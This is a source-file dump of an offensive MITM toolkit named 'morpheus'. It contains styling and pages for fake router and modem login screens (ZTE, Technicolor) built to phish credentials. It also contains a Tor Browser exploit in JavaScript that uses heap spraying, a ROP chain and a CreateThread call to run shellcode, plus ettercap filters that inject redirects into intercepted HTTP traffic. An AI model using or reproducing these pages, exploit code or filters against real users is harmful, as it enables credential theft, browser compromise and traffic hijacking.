52 | .Table_DataLabel {font-size:1em; background-color:/*gray02*/#E2E2E2; FONT-WEIGHT:bold;} 53 | .Table_DataValue {font-size:1em; background-color:/*gray02*/#E2E2E2; FONT-WEIGHT:normal;} 54 | .Table_DataValue_Selected {font-size:1em; background-color:/*gray02*/#E2E2E2; FONT-WEIGHT:normal;} 55 | 56 | .Tab_Inactive a,.Tab_Active a {text-decoration:none;} 57 | .Tab_Inactive {color:/*gray04*/#666; background-color:/*gray02*/#E2E2E2; FONT-WEIGHT:normal;} 58 | .Tab_Active 
{color:white; background-color:/*color01*/#0199cb; FONT-WEIGHT:bold;} 59 | 60 | .Panel_ButtonBar {color:#FFFFFF; FONT-WEIGHT:bold;} 61 | .Panel_ButtonBar_Button { color:/*gray01*/#333; FONT-WEIGHT:bold; TEXT-ALIGN:center;} 62 | .Panel_ButtonBar_Button:Hover { color:/*color01*/#0199cb; FONT-WEIGHT:bold; TEXT-ALIGN:center;} 63 | 64 | .Form_Title {font-size:1em; color:white; background-color:/*gray04*/#666; FONT-WEIGHT:bold;} 65 | .Form_DataLabel {font-size:1em;} 66 | .Form_InputText {width:175pt; color:#000000;} 67 | .Form_InputPassword {width:175pt; color:#000000;} 68 | .Form_InputSelect {width:175pt; color:#000000;} 69 | .Form_InputSelect_Wide {width:250pt; color:#000000;} 70 | 71 | .wizardGrpToolbar {font-size:12px; font-weight:bold; background-color:#ffffff;} 72 | .wizardGrpTitle {font-size:12px; font-weight:bold; color:/*gray01*/#333;} 73 | .wizardGrpTxt {font-size:11px; font-weight:normal; color:#807F83;} 74 | 75 | .wizardCentralPanel {font-size:11px; font-weight:normal; color:#000000; background-color:#ffffff;} 76 | .wizardVarAlias {font-size:11px; font-weight:normal; color:#000000;} 77 | .wizardVarDesc {font-size:11px; font-weight:normal; color:#000000;} 78 | .wizardVarError {font-size:11px; font-weight:bold; color:#FF0000;} 79 | 80 | .wizardFrontCompletePanel {font-size:11px; color:#000000; background-color:#ffffff;} 81 | 82 | .wizardSummaryText {font-family:Fixedsys, Courier New, Courier ; font-size:1em; font-weight:normal; color:#000000; text-align:left; background-color:#ffffff;} 83 | .wizardFooterPanel {font-size:11px; font-weight:normal; color:#000000; background-color:#ffffff;} 84 | .wizardFooterPanelButton {font-size:11px; font-weight:normal; color:#000000; background-color:#ffffff; cursor:default;} 85 | 86 | .panelTitle {color:#ffffff; background-color:/*color01*/#0199cb; FONT-SIZE:12px; FONT-WEIGHT:bold;} 87 | .panelDelimiter {color:/*gray04*/#666; background-color:/*gray02*/#E2E2E2; FONT-SIZE:12px;} 88 | .panelToolbar {color:#FFFFFF; 
background-color:#CC9933; FONT-SIZE:12px; FONT-WEIGHT:bold; TEXT-ALIGN:center;} 89 | .panelLine {color:/*gray04*/#666; background-color:/*gray02*/#E2E2E2;} 90 | .panelButton {color:#FFFFFF; FONT-SIZE:12px; FONT-WEIGHT:bold; TEXT-DECORATION:underline;} 91 | .panelButtonSelected {color:#FFFFFF; FONT-SIZE:12px; FONT-WEIGHT:bold; TEXT-DECORATION:underline;} 92 | 93 | .error {FONT-WEIGHT:bold; color:#993333;} 94 | .margin {MARGIN-LEFT:5px; MARGIN-RIGHT:5px;} 95 | .warning {FONT-SIZE:1.1em; color:#993333; LINE-HEIGHT:normal;} 96 | .nogo {color:/*gray04*/#666; background-color:/*gray02*/#E2E2E2;} 97 | 98 | .black {background-color:#000000;} 99 | form {margin:0px;} 100 | 101 | .NavBar {margin:0px 0px 10px 0px;} 102 | .NavBar, .NavBar a, .NavBar a:visited {font-size:1em; color:/*gray01*/#333;TEXT-DECORATION:NONE;} 103 | .NavBar a:hover {font-size:1em; color:/*color01*/#0199cb;} 104 | 105 | .contentcontainer {margin:0px;} 106 | .contentcontainer a:link, .contentcontainer a:visited {color:/*color01*/#0199cb;} 107 | .contentcontainer a:hover {color:/*color01*/#0199cb;} 108 | .contentcontainer hr {visibility:hidden;display:none} 109 | .contentitem {padding:10px;text-align:left;width:auto;margin-bottom:10px;} 110 | 111 | .homeitemdescr {font-size:1.1em;} 112 | .homeline a:hover {font-weight:bold; color:/*color01*/#0199cb;} 113 | .homeline a:link,.homeline a:visited,.homeline a:active {font-weight:bold; color:/*color01*/#0199cb;} 114 | 115 | .itemtitle {color:/*gray01*/#333; font-size:1.6em; font-weight:bold;} 116 | 117 | .blocktitle {font-size:1.2em; color:#000000; font-weight:bold;} 118 | .blocktitle a:hover {font-weight:bold; color:/*color01*/#0199cb;} 119 | .blocktitle a:link,.blocktitle a:visited,.blocktitle a:active {font-weight:bold; color:/*color01*/#0199cb;} 120 | 121 | .hwintftable img {display:block;} 122 | .hwintftable td {vertical-align:middle;} 123 | .hwintftable a:hover {color:/*color01*/#0199cb;} 124 | .hwintftable a:link,.hwintftable a:visited,.hwintftable 
a:active {color:/*color01*/#0199cb;} 125 | 126 | .edittable {margin-bottom:6px;} 127 | .edittable th {color:white; background-color:/*gray04*/#666;} 128 | .edittable th, .edittable td {padding-left:4px; padding-right:4px;} 129 | .edittable .oddrow {background-color:/*gray05*/#CACACA;} 130 | .edittable .evenrow {background-color:/*gray02*/#E2E2E2;} 131 | 132 | .tasks {margin:12px 0px 10px 0px;} 133 | .tasks th {color:/*gray01*/#333;font-size:1.2em;text-align:left;width:100%;} 134 | .tasks th, .tasks td {padding:4px;} 135 | .task a:link,.task a:visited,.task a:active {color:/*color01*/#0199cb;text-decoration:none} 136 | .task a:hover {color:/*color01*/#0199cb;} 137 | 138 | /*gradients*/ 139 | .contentitem{ 140 | background-color:#F4F4F4; /* for non-css3 browsers */ 141 | filter: progid:DXImageTransform.Microsoft.gradient(GradientType=1, startcolorstr='#F4F4F4', endcolorstr='#CCCCCC'); /* for IE */ 142 | background: -webkit-gradient(linear, left top, right top, from(#F4F4F4), to(#CCCCCC)); /* for webkit browsers */ 143 | background: -moz-linear-gradient(left,#F4F4F4,#CCCCCC); /* for firefox 3.6+ */ 144 | } 145 | 146 | /*CSS para WLAN Host Details*/ 147 | #signalmeterbox { display:inline;background: url("images/dial.png") no-repeat 0 0; float: left; height: 135px; margin-bottom: 15px; margin-left: 55px; overflow: hidden; position: relative; width: 250px; } 148 | .Signal {} 149 | 150 | .wlanSigTable {width:600px;} 151 | .wlanSigTable #left {width:300px;vertical-align:middle;margin: 0px 5px 0px 0px;} 152 | .wlanSigForm {margin-left:30px;width:250px; disable:enabled; color:#333333; background: url(images/fake.png) center center no-repeat; /* This ruins default border */ border: 0px solid #888;} 153 | 154 | 155 | .wlanhost,.wlanhost a ,.wlanhost a:active,.wlanhost a:hover{ width:600px;margin: 0px 20px 8px 20px;} 156 | .wlanhostleft {vertical-align:text-middle; display:inline;width:300px;color:/*color01*/#000000;font-size:1.2em;font-weight:bold;} 157 | .wlanhostleft img 
{vertical-align:middle;margin: 0px 5px 0px 0px;} 158 | .wlanhostcenter {align:middle;margin: 0px 5px;text-align:center;width:85px;color:/*color01*/#000000;font-size:1.1em;font-weight:bold;} 159 | .wlanhostright {align:middle;margin: 0px 5px;text-align:center;width:85;color:/*color01*/#000000;font-size:1.2em;font-weight:bold;} 160 | .wlanhostlist {width:100%;} 161 | .wlannohost{text-align:center;width:600px;} 162 | 163 | .wlanhostlefth {vertical-align:text-middle; display:inline;width:300px;text-decoration:none;font-weight:bold; color:/*color01*/#0199cb;} 164 | .wlanhostlefth img {vertical-align:middle;margin: 0px 5px 0px 0px;} 165 | .wlanhostcenterh {align:middle;margin: 0px 5px;text-align:center;width:85px;font-weight:bold; color:/*color01*/#0199cb;} 166 | .wlanhostrighth {align:middle;margin: 0px 5px;text-align:center;width:85;} 167 | /*CSS para pagima GAMER*/ 168 | .disabled { vertical-align:text-top; color:#c90000; } 169 | .enabled { vertical-align:text-top; color:#389143; } 170 | /*CSS para WIFI ANALYZER*/ 171 | 172 | .oddrowline {border-width:1px 0px 1px 0px;border-style:solid;background-color:/*gray05*/#CACACA;} 173 | .oddrowline {background-color:/*color01*/#999999;} 174 | .oddrow, .evenrow,.oddrowline ,.evenrowline {padding: 0px 2px 0px 2px;} 175 | .edittable .oddrow {background-color:/*gray05*/#CACACA;} 176 | .oddrow {background-color:/*gray05*/#CACACA;} 177 | .edittable .evenrow {background-color:/*gray02*/#E2E2E2;} 178 | .evenrow {background-color:/*gray02*/#E2E2E2;} 179 | /*.GraphX {width:512px;text-align:center}*/ 180 | /*.GraphY {height:150px;vertical-align:middle;}*/ 181 | #Graph {width:512px;height:150px;position:relative;border-bottom:1px;border-top:0px; border-left:1px;border-right:0px;border-style:solid;} 182 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/Technicolor/user__xl.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/Technicolor/user__xl.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/chinese_1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/ZTE/chinese_1.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/close.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/ZTE/close.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/help.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/ZTE/help.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/login.css: -------------------------------------------------------------------------------- 1 | * { 2 | margin: 0 0 0 0; 3 | padding: 0; 4 | } 5 | #container { 6 | margin: 0 auto; 7 | width: 778px; 8 | text-align: left; 9 | position: relative; 10 | min-height: 100%; /* For Modern Browsers */ 11 | height: auto !important; /* For Modern Browsers */ 12 | height: 100%; /* For IE */ 13 | } 14 | #head { 15 | width:778px; 16 | } 17 | #banner { 18 | width:778px; 19 | height:60px; 20 | } 21 | #content { 22 | width:776px; 23 | padding-bottom:20px; 24 | min-height: 270px; /* For Modern Browsers */ 25 | height: auto !important; /* For Modern Browsers */ 26 | height: 50%; /* For IE */ 27 | border-left:1px solid 
#B1B1B1; 28 | border-right:1px solid #B1B1B1; 29 | } 30 | #content:after { 31 | clear: both; 32 | display: block; 33 | font: 1px/0px serif; 34 | content: "."; 35 | height: 0; 36 | visibility: hidden; 37 | } 38 | #content li { 39 | list-style:none; 40 | display:block; 41 | } 42 | #bottom { 43 | width: 776px; 44 | height: 28px; 45 | 46 | border-left:1px solid #B1B1B1; 47 | border-right:1px solid #B1B1B1; 48 | } 49 | #bottom li { 50 | list-style:none; 51 | float:left; 52 | height: 28px; 53 | } 54 | #bottom a { 55 | display:block; 56 | height:28px; 57 | } 58 | #bottom a.b1 { 59 | position:absolute; 60 | left:1px; 61 | width:156px; 62 | } 63 | #bottom a.b2 { 64 | width:54px; 65 | margin-right:2px; 66 | position:absolute; 67 | left:157px; 68 | } 69 | #bottom a.b2 ul { 70 | text-align:right; 71 | padding-top:5px; 72 | } 73 | #bottom a.b3 { 74 | width:564px; 75 | height:28px; 76 | position:absolute; 77 | left:211px; 78 | background-color:#81d549; 79 | margin-right:2px; 80 | text-align:right; 81 | } 82 | .copyright {height:16px;width:776px; padding-top:10px; border-left:1px solid #B1B1B1; border-right:1px solid #B1B1B1; text-align:center;} 83 | .bottom_line {background-color:#5aa929;height:8px; width:778px;} 84 | .submit {padding-top:2px;} 85 | #bottomx { 86 | width: 100%; 87 | position: absolute; 88 | bottom: 0 !important; 89 | bottom: -1px; /* For Certain IE widths */ 90 | height: 1px; 91 | } 92 | 93 | a:link { text-decoration: none; } 94 | a:visited { text-decoration: none; } 95 | a:active { text-decoration: none; } 96 | a:hover { text-decoration:none; } 97 | 98 | #loginArea { width:778px;height:389px;background-color:#f7f7f7; } 99 | .login_frame { width:380px;height:108px;position:absolute;top:155px;left:200px; } 100 | .login_title { width:380px;height:19px;background-color:#69ce28;list-style:none; } 101 | .login_title_left { width:4px;height:19px;float:left;} 102 | .login_title_center { width:286px;height:15px;float:left;padding:4px 0 0 5px;color:#ffffff;font-weight: 
bold;} 103 | .login_title_center2 { width:75px;height:19px;float:left;background:url(../img/push_2.gif) no-repeat left top;color:#ffffff;font-weight: bold;} 104 | .login_title_centeren { width:75px;height:19px;float:left;color:#ffffff;font-weight: bold;} 105 | .login_title_centerch { width:75px;height:19px;float:left;color:#ffffff;font-weight: bold;} 106 | .language_div { width:60px;height:15px;padding:4px 0 0 15px; } 107 | .login_title_right { width:4px;height:19px;float:left; } 108 | .login_content { width:378px;height:87px;background-color:#f8fff3;list-style:none;border:1px solid #69ce28; } 109 | .login_blank { width:337px;height:14px;list-style:none;padding-left: 10px } 110 | .login_ul_1 { width:337px;height:20px;list-style:none;padding-left: 10px } 111 | .login_li_1 { width:120px;height:17px;float:left;text-align:right;padding-top:3px; } 112 | .login_li_2 { width:135px;height:20px;float:left;padding-left:4px; } 113 | .login_li_3 { width:78px;height:20px;float:left; } 114 | 115 | .language_1 { color:#FFFFFF;font-weight: bold;} 116 | .language_1 a:link { color: #ffffff;font-weight: bold; text-decoration: none; } 117 | .language_1 a:visited { color: #ffffff;font-weight: bold; text-decoration: none; } 118 | .language_1 a:active { color: #ffffff;font-weight: bold; text-decoration: none; } 119 | .language_1 a:hover { color: #ffffff;font-weight: bold; text-decoration: none; } 120 | .type{ position:absolute;top:32px;right:25px;font:20px Arial,sans-serif;color:#fff;z-index:999; } 121 | 122 | html, body { 123 | height: 100%; /* Required */ 124 | font-size: 12px; 125 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 126 | min-height:101%; 127 | background-color:#fff; /* 613000551662 - style unifys in case window color changes */ 128 | } 129 | 130 | 131 | .username,.password { 132 | width:120px; 133 | height:18px; 134 | border:1px solid #7F9DB7; 135 | font-size: 12px; 136 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 137 | 
vertical-align:middle; 138 | text-align:left; 139 | } 140 | 141 | 142 | .login { 143 | height:22px; 144 | width:80px; 145 | vertical-align:middle; 146 | text-align:center; 147 | font-size: 12px; 148 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 149 | } 150 | .note{ 151 | font-size: 12px; 152 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 153 | color:#FFFF00; 154 | } -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/styleen.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 3 | } 4 | 5 | .button5,.button6,.button7 { 6 | height:20px; 7 | vertical-align:middle; 8 | text-align:center; 9 | font-size: 12px; 10 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 11 | } 12 | .button5 { 13 | width:80px; 14 | } 15 | .button6 { 16 | width:180px; 17 | } 18 | .button7 { 19 | width:120px; 20 | } 21 | 22 | .inputId10 { 23 | height:17px; 24 | border:1px solid #7F9DB7; 25 | font-size: 12px; 26 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 27 | vertical-align:middle; 28 | text-align:left; 29 | } 30 | .inputId10 { 31 | width:120px; 32 | } 33 | .list_1,.list_2,.list_4,.list_8, { 34 | height:19px; 35 | border:1px solid #7F9DB7; 36 | font-size: 12px; 37 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 38 | vertical-align:middle; 39 | text-align:left; 40 | } 41 | .list_1 { 42 | width:130px; 43 | } 44 | .list_2 { 45 | width:180px; 46 | } 47 | .list_4 { 48 | width:185px; 49 | } 50 | .list_8 { 51 | width:140px; 52 | } 53 | 54 | 55 | table.infor { 56 | width:460px; 57 | } 58 | table.infor tr.white_1 { 59 | background-color:#FFFFFF; 60 | } 61 | table.infor td.tdleft { 62 | padding-right:5px; 63 | width:50%; 64 | height:27px; 65 | text-align:right; 66 | } 67 | table.table td.td4 { 68 | width:10%; 69 | height:24px; 70 | text-align:right; 71 | } 72 | 
table.table td.td11 { 73 | width:50%; 74 | height:24px; 75 | text-align: right; 76 | } 77 | 78 | 79 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | DiSpt 4 | 5 | 22 | 23 | 24 | 42 | 43 | 44 | 45 | 46 |

47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 |
 
 
56 | Authentication Required  57 |

58 | The server at http://GatWa:80 59 |
60 | requires a username and password. 61 |

62 |

Username:
Password:
 
 
86 | 87 | 88 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Modem access 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /bin/phishing/tor_0day/License: -------------------------------------------------------------------------------- 1 | 2 | MIT License 3 | 4 | Copyright (c) 2016 Tahar Amine 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | 24 | -------------------------------------------------------------------------------- /bin/phishing/tor_0day/Tor-Exploit.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The Onion Route Browser Exploit - TheBlaCkCoDeR 2016 5 | 6 | 140 | 141 | 152 | 153 | 154 | 155 |

156 | 157 |
158 | 159 | 162 | 163 | 164 | -------------------------------------------------------------------------------- /bin/phishing/tor_0day/cssbanner.js: -------------------------------------------------------------------------------- 1 | self.onmessage = 2 | function(msg) { 3 | 4 | thecode = msg.data; 5 | var pack = function (b) { var a = b >> 16; return String.fromCharCode(b 6 | & 65535) + String.fromCharCode(a) }; 7 | 8 | function Memory(b,a,f) 9 | { 10 | this._base_addr=b; 11 | this._read=a; 12 | this._write=f; 13 | this._abs_read = function(a) { 14 | a >= this._base_addr ? a = this._read( a - this._base_addr) : ( 15 | a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) ); 16 | return 0>a?4294967295+a+1:a 17 | 18 | }; 19 | this._abs_write = function(a,b) { 20 | a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a 21 | = 4294967295 - this._base_addr + 1 + a, this._write(a,b) ) 22 | }; 23 | this.readByte = function(a) { 24 | return this.read(a) & 255 25 | 26 | }; 27 | this.readWord = function(a) { 28 | return this.read(a) & 65535 29 | }; 30 | this.readDword = function(a){ return this.read(a) }; 31 | this.read = function(a,b) { 32 | if (a%4) { 33 | var c = this._abs_read( a & 4294967292), 34 | d = this._abs_read( a+4 & 4294967292), 35 | e = a%4; 36 | return c>>>8*e | d<<8*(4-e) 37 | } 38 | return this._abs_read(a) 39 | }; 40 | this.readStr = function(a) { 41 | for(var b = "", c = 0;;) { 42 | if (32 == c) 43 | return ""; 44 | var d = this.readByte(a+c); 45 | if(0 == d) 46 | break; 47 | b += String.fromCharCode(d); 48 | c++ 49 | } 50 | return b 51 | 52 | }; 53 | this.write = function(a){} 54 | } 55 | function PE(b,a) { 56 | this.mem = b; 57 | this.export_table = this.module_base = void 0; 58 | this.export_table_size = 0; 59 | this.import_table = void 0; 60 | this.import_table_size = 0; 61 | this.find_module_base = function(a) { 62 | for(a &= 4294901760; a; ) { 63 | if(23117 == this.mem.readWord(a)) 64 | return this.module_base=a; 65 | a -= 65536 66 | } 
67 | }; 68 | this._resolve_pe_structures = function() { 69 | peFile = this.module_base + this.mem.readWord(this.module_base+60); 70 | if(17744 != this.mem.readDword(peFile)) 71 | throw"Bad NT Signature"; 72 | this.pe_file = peFile; 73 | this.optional_header = this.pe_file+36; 74 | this.export_directory = 75 | this.module_base+this.mem.readDword(this.pe_file+120); 76 | this.export_directory_size = this.mem.readDword(this.pe_file+124); 77 | this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128); 78 | this.import_directory_size=this.mem.readDword(this.pe_file+132)}; 79 | this.resolve_imported_function=function(a,b){ 80 | void 0==this.import_directory&&this._resolve_pe_structures(); 81 | for(var 82 | e=this.import_directory,c=e+this.import_directory_size;e>2)+i] = d; 146 | d =(b+4>>2)+e; 147 | c[d++]=g; 148 | c[d++]=a+(b+4*e+28); 149 | c[d++]=a; 150 | c[d++]=4096; 151 | c[d++]=4096; 152 | c[d++]=64; 153 | c[d++]=3435973836; 154 | return c 155 | } 156 | } 157 | var conv=new ArrayBuffer(8), 158 | convf64=new Float64Array(conv), 159 | convu32=new Uint32Array(conv), 160 | qword2Double=function(b,a) { 161 | convu32[0]=b; 162 | convu32[1]=a; 163 | return convf64[0] 164 | }, 165 | doubleFromFloat = function(b,a) { 166 | convf64[0]=b; 167 | return convu32[a] 168 | 169 | }, 170 | sprayArrays=function() { 171 | for(var b=Array(262138),a=0;262138>a;a++) 172 | b[a]=fzero; 173 | for(a=0;aj;j++) 245 | spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27); 246 | spr[i][offset+(o3+8)/8]=qword2Double(0,0); 247 | spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0); 248 | spr[i][offset+(o7+168)/8]=qword2Double(0,3); 249 | spr[i][offset+(o7+88)/8]=qword2Double(0,2); 250 | break 251 | } 252 | for(;memory.length==len;); 253 | var mem=new Memory(memarrayloc+48, 254 | function(b){return memory[b/4]}, 255 | function(b,a){memory[b/4]=a}), 256 | xulPtr=mem.readDword(memarrayloc+12); 257 | spr[arr_index][arr_offset+1]=ropArrBuf; 258 | 
ropPtr=mem.readDword(arrBase+8); 259 | spr[arr_index][arr_offset+1]=null; 260 | ropBase=mem.readDword(ropPtr+16); 261 | var rop=new ROP(mem,xulPtr); 262 | rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); 263 | var backupESP=rop.findSequence([137,1,195]), ropChain=new 264 | Uint32Array(ropArrBuf); 265 | ropChain[0]=backupESP; 266 | CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread"); 267 | for(var i=0;i $rhost.log 41 | rm -f parse > /dev/nul 2>&1 42 | else 43 | external="YES" 44 | echo "" > warn.log 45 | fi 46 | if [ -e triggertwo ]; then 47 | secund=`cat triggertwo` 48 | echo "" > $secund.log 49 | rm -f triggertwo > /dev/nul 2>&1 50 | fi 51 | hour=`date | awk {'print $4,$5,$6'}` 52 | clear 53 | 54 | 55 | # 56 | # bash trap (ctrl+c) abort execution 57 | # 58 | trap ctrl_c INT 59 | ctrl_c() { 60 | echo "" 61 | echo "[Morpheus] Abort module execution .." 62 | sleep 2 63 | exit 64 | } 65 | 66 | 67 | 68 | # 69 | # first terminal message 70 | # 71 | if [ "$external" = "YES" ]; then 72 | echo "[Morpheus] Loging TCP/UDP Events .." 73 | echo " * Interface : $interface" 74 | echo " * Modem Ip : $modem" 75 | echo " * Hour/Date : $hour" 76 | echo " * ---" 77 | echo "" 78 | else 79 | echo "[Morpheus] Loging Events in: 67/UDP(dst) .." 80 | echo " * Interface : $interface" 81 | echo " * Modem Ip : $modem" 82 | echo " * Hour/Date : $hour" 83 | if [ -e $secund.log ]; then 84 | echo " * status : Filtering two targets at once [!]" 85 | echo " * Device : $rhost.lan" 86 | echo " * Device : $secund.lan" 87 | else 88 | echo " * Device : $rhost.lan" 89 | fi 90 | echo " * ---" 91 | echo "" 92 | fi 93 | 94 | 95 | 96 | # 97 | # Bash Loop funtion .. 98 | # BEEP IF found 'beep-warning.beep' 99 | # 100 | while : 101 | do 102 | # 103 | # sleep time in loop funtion .. 104 | # increase time in old pc's to consume less resources .. 105 | # HINT: this value sets loop and sound warning delay time .. 
106 | # 107 | sleep 1.5 108 | 109 | # check for .beep file existence 110 | if [ -e beep-warning.beep ]; then 111 | # store date to display at event trigger 112 | hour=`date | awk {'print $4,$5,$6'}` 113 | echo " ✔ Event trigger at: $hour .." 114 | # 115 | # emit one warning sound (BEEP) 116 | # 117 | if [ "$found" = "ogg" ]; then 118 | cd .. && cd bin && paplay $sound 119 | cd .. && cd logs 120 | else 121 | $sound 122 | sleep 0.3 123 | fi 124 | 125 | # 126 | # build logfile (in logs folder) 127 | # 128 | if [ -e parse.bin ]; then 129 | echo "[Morpheus] Loging Events in: 67/UDP(dst) .." >> $rhost.log 130 | echo " * Interface : $interface" >> $rhost.log 131 | echo " * Modem Ip : $modem" >> $rhost.log 132 | echo " * Hour/Date : $hour" >> $rhost.log 133 | echo " * Device : $rhost.lan" >> $rhost.log 134 | echo " * Action : Request access to local LAN" >> $rhost.log 135 | echo " * ---" >> $rhost.log 136 | echo "" >> $rhost.log 137 | fi 138 | 139 | if [ -e triggertwo.bin ]; then 140 | echo "[Morpheus] Loging Events in: 67/UDP(dst) .." >> $secund.log 141 | echo " * Interface : $interface" >> $secund.log 142 | echo " * Modem Ip : $modem" >> $secund.log 143 | echo " * Hour/Date : $hour" >> $secund.log 144 | echo " * Device : $secund.lan" >> $secund.log 145 | echo " * Action : Request access to local LAN" >> $secund.log 146 | echo " * ---" >> $secund.log 147 | echo "" >> $secund.log 148 | fi 149 | 150 | if [ "$external" = "YES" ]; then 151 | echo "[Morpheus] Loging Events .." >> warn.log 152 | echo " * Interface : $interface" >> warn.log 153 | echo " * Modem Ip : $modem" >> warn.log 154 | echo " * Hour/Date : $hour" >> warn.log 155 | echo " * ---" >> warn.log 156 | echo "" >> warn.log 157 | fi 158 | 159 | 160 | # 161 | # emit more than one beep so that users hear it properly .. 
162 | # 163 | if [ "$found" = "sys" ]; then 164 | if [ -e beep-warning.beep ]; then 165 | for i in `seq 1 7`; do 166 | printf '\a' 167 | sleep 0.1 168 | done 169 | fi 170 | fi 171 | 172 | # 173 | # delete all trigger files so another sound is emitted if the event is triggered again in the future.. 174 | # 175 | if [ -e beep-warning.beep ]; then 176 | rm -f beep-warning.beep > /dev/null 2>&1 177 | rm -f triggertwo.bin > /dev/null 2>&1 178 | rm -f parse.bin > /dev/null 2>&1 179 | fi 180 | fi 181 | 182 | 183 | # end of loop function 184 | done 185 | 186 | 187 | cd .. 188 | # exit script execution 189 | exit 190 | 191 | -------------------------------------------------------------------------------- /bin/www.gmail.com.pem: 
-------------------------------------------------------------------------------- /filters/EasterEgg.eft: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # HTTPS Request/Response Filter # 4 | # based on code from ALoR & NaGA # 5 | # # 6 | # This program is free software; you can redistribute it and/or modify # 7 | # it under the terms of the GNU General Public License as published by # 8 | # the Free Software Foundation; either version 2 of the License, or # 9 | # (at your option) any later version. # 10 | # # 11 | ############################################################################ 12 | 13 | ## 14 | # This filter will redirect target requests under mitm 15 | # attacks to the specified redirect url. [ http-equiv= ] 16 | ## 17 | 18 | 19 | 20 | # 21 | # Report port 443 + 80 (tcp) traffic just to make displays 22 | # that shows to users that filter its working fine .. 
23 | # 24 | if (ip.proto == TCP && tcp.dst == 443 || tcp.src == 443) { 25 | msg("[morpheus] host:ALL [ ⊶ ] port:443 [tcp] https ☆"); 26 | } 27 | 28 | 29 | 30 | 31 | 32 | ########################## 33 | ## Zap Content Encoding ## 34 | ########################## 35 | if (ip.proto == TCP && tcp.dst == 80 || tcp.src == 80){ 36 | if (search(DATA.data, "Accept-Encoding")){ 37 | replace("Accept-Encoding", "Accept-Rubbishh"); 38 | msg("\n[morpheus] host:request [ ⊶ ] found .."); 39 | } 40 | } 41 | 42 | 43 | 44 | ##################### 45 | ## Replace Content ## 46 | ##################### 47 | if (ip.proto == TCP && tcp.src == 80 || tcp.dst == 80){ 48 | if (search(DATA.data, "")) { 49 | msg("[Morpheus] | action: redirecting target traffic ✔"); 50 | msg("[Morpheus] | injec: meta http-equiv on request ✔"); 51 | # redirect target traffic by replacing html tag with one redirection url 52 | replace("", ""); 53 | replace("", ""); 54 | msg("[Morpheus] |_ dns_spoof: IpAdR \n"); 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /filters/IG.eft: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # HTTP Request/Response Filter # 4 | # based on code from ALoR & NaGA # 5 | # # 6 | # This program is free software; you can redistribute it and/or modify # 7 | # it under the terms of the GNU General Public License as published by # 8 | # the Free Software Foundation; either version 2 of the License, or # 9 | # (at your option) any later version. # 10 | # # 11 | ############################################################################ 12 | 13 | 14 | ## 15 | # This filter will regex search target captured tcp headers (mitm) 16 | # to gather information about target system browser settings. 
# Special Thanks: shanty damayanti
##


#
# Report port 443 (tcp) traffic, only to show the user
# that the filter is working.
#
if (ip.proto == TCP && tcp.dst == 443 || tcp.src == 443) {
   msg("[morpheus] host:TaRgEt [ ⊶ ] port:443 [tcp] https ☆");
}


